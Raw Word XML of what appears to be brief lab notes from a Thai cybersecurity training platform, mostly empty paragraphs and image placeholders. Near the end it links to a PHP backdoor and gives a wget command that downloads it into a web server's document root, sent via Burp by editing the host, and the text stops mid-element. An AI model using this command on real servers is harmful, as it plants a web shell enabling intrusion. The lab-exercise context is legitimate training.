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5B842D66" wp14:paraId="2C078E63" wp14:textId="49B5D316">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="R85bb7de4b1a8438b">
        <w:r w:rsidRPr="50EAEFC5" w:rsidR="0BC22F21">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/111</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="5B842D66">
        <w:drawing>
          <wp:anchor xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="63D73CE9" wp14:anchorId="4759FED2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>942975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>390525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4210050" cy="5943600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5752964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75296403" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId144040174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50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="0FC9F982" w14:textId="21043551">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="3168E9AF" w14:textId="0452AD8B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="49C81A5C" w14:textId="037DB171">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="2BADFC16" w14:textId="727F0473">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="370BFC3E" w14:textId="76565479">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="1B13268C" w14:textId="62121403">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="02B16221" w14:textId="1AEEBB2D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="4EDE29E2" w14:textId="3A8E23EE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="2A598C0F" w14:textId="5E7EA582">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="48CBC3C3" w14:textId="546EC5F0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="20ABE9BE" w14:textId="6155C4BB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="3A920BC4" w14:textId="54DAE7BC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="592CA81A" w14:textId="1AAD14BB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="47DAD7DC" w14:textId="7FF1574D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="553D190F" w14:textId="498A9FFE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="44EE3309" w14:textId="486CFC6A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="15272CE7" w14:textId="4418D10B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="3CE54F7A" w14:textId="647CEE94">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="48A0EB9D" w14:textId="5909FF5C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="60078D30" w14:textId="026E2114">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="05170025" w14:textId="35A90AE1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="4787BE96" w14:textId="4FC45E47">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="398FB2E0" w14:textId="34996180">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="24B5E3D5" w14:textId="674802B4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="2B4BBB35" w14:textId="37333A94">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="741CF7EA" w14:textId="24A8DC98">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0E8CF541">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="4F266D1F" wp14:anchorId="5B4ABD58">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1162050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>190500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3400425" cy="3900488"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4972922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97292246" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4071244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400425" cy="390048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50EAEFC5" w:rsidP="50EAEFC5" w:rsidRDefault="50EAEFC5" w14:paraId="16F5729A" w14:textId="0277DFDC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="56F4C0C1">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="26AE1C08" wp14:anchorId="069623DF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1123950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3781425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3381375" cy="4479783"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11248883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24888367" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId944405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81375" cy="447978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56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="222E70A5" w14:textId="783ED1E6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="5FEE3D77" w14:textId="429DC32F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="3DB8BCEA" w14:textId="6A01F3D6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="6F45A6FF" w14:textId="28545849">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="7E149282" w14:textId="446206D0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="0B95E4DA" w14:textId="0ED4A213">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="1DE25B7F" w14:textId="07133606">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="5BACC664" w14:textId="5677971E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="785579C3" w14:textId="349B4761">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="6D81ADD3" w14:textId="3F3D3401">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="2C2B6E3A" w14:textId="2404E128">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="68AF324B" w14:textId="4C8CBCD7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="1D773E1E" w14:textId="52DB79C9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="3C75E32C" w14:textId="4DA97437">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="24131CF5" w14:textId="6462BCBC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="04BF2354" w14:textId="3366AF87">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="754CEBC9" w14:textId="658BEDF9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="5A6C6432" w14:textId="57C954E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="728F0A6A" w14:textId="38C4AF34">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="7D30A0CF" w14:textId="1DD0E0C4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="07242EC5" w14:textId="039DA506">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="24504F3E" w14:textId="0CCBB3A2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="5F0D547E" w14:textId="2CD94B04">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="1A60D00F" w14:textId="681BD4E6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="56F4C0C1" w:rsidP="56F4C0C1" w:rsidRDefault="56F4C0C1" w14:paraId="433CDDAD" w14:textId="51FF0C6A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2AB30B53">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52C2F069" wp14:editId="5FB66F64">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>590550</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-28575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4429814" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15512412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51241285" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId15065997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29814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2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="3760F909" w14:textId="7893424E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="59B5681B" w14:textId="610CBDFD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="0478A5AE" w14:textId="3F63BA55">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="0CB740D0" w14:textId="23A6888E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="1EE5BC3E" w14:textId="05828AB4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="0AA2134F" w14:textId="5BE5BBE9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="22C0CCDD" w14:textId="4A681FD5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="2EFF0948" w14:textId="508DD3AB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB30B53" w:rsidP="2AB30B53" w:rsidRDefault="2AB30B53" w14:paraId="4409A0AF" w14:textId="04C3CC93">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2AB30B53">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04E88D08" wp14:editId="07307032">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>504825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4477780" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="190318197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03181974" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId187429365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7778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44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="16690594" w14:textId="31D47FEC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="207A3DFD" w14:textId="5B883CF5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="74F2C5EE" w14:textId="5174C6D5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="00C867D3" w14:textId="4E5F5419">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="5D2137B8" w14:textId="4E6CDCB5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="7BCD738C" w14:textId="7B110090">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="3B636057" w14:textId="30FB9D54">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="5709A2B0" w14:noSpellErr="1" w14:textId="112E3950">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="R181c4021c43e404e">
        <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/materaj2/simplephpshell/master/backdoor.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="2C371C4C" w:rsidP="6EBF35C9" w:rsidRDefault="2C371C4C" w14:paraId="2914953B" w14:textId="3EC792E0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C371C4C">
        <w:drawing>
          <wp:inline wp14:editId="511C6F79" wp14:anchorId="601EF80E">
            <wp:extent cx="3214552" cy="3310034"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7860177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86017793" name="Picture 786017793"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId14484291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14552" cy="3310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C371C4C" w:rsidP="6EBF35C9" w:rsidRDefault="2C371C4C" w14:paraId="35370345" w14:textId="635B04D2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t>เอา</w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t xml:space="preserve"> burp </w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t>ยิง</w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t>แล้วแก้</w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2C371C4C">
        <w:rPr/>
        <w:t>ต</w:t>
      </w:r>
      <w:r w:rsidR="543D6189">
        <w:rPr/>
        <w:t>รง</w:t>
      </w:r>
      <w:r w:rsidR="543D6189">
        <w:rPr/>
        <w:t xml:space="preserve"> host </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C371C4C" w:rsidP="6EBF35C9" w:rsidRDefault="2C371C4C" w14:paraId="245A3458" w14:textId="411D5894">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --output-document /var/www/html/</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>backdoor.php</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> raw.githubusercontent.com/materaj2/</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplephpshell</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/master/</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>backdoor.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C371C4C" w:rsidP="6EBF35C9" w:rsidRDefault="2C371C4C" w14:paraId="0A5350DB" w14:textId="7C9C85F5">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(any -</w:t>
      </w:r>
      <w:r w:rsidRPr="6EBF35C9" w:rsidR="2C371C4C">
        <w:rPr>
